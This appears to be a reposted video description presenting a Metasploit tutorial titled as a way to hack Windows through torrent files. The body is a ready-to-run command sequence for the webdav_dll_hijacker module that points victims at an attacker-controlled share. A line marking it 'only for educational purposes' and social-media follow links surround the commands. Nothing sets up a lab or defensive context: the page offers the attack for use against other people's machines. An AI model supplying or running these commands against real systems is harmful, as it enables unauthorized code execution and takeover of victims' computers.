How to hack Windows with torrent file using Metasploit on Kali Linux 2018.1

mILtAIMrLdM/default.jpg

How to hack Windows with torrent file using Metasploit on Kali Linux 2018.1
!!! ONLY FOR EDUCATIONAL PURPOSES !!!

Description:
This module presents a directory of file extensions that can lead to
code execution when opened from the share. The default EXTENSIONS
option must be configured to specify a vulnerable application type.

commands:
use exploit/windows/browser/webdav_dll_hijacker
set extensions torrent
set srvhost yourip
exploit
...

THANK YOU FOR WATCHING
SUBSCRIBE
SHARE
LIKE
FOLLOW US ON INSTAGRAM
https://www.instagram.com/kali_linux_...
FOLLOW US ON TWITTER
https://twitter.com/KALILINUXTRICKS

mILtAIMrLdM/default.jpg
How to hack Windows with torrent file using Metasploit on Kali Linux 2018.1 How to hack Windows with torrent file using Metasploit on Kali Linux 2018.1 Reviewed by Anonymous on April 11, 2018 Rating: 5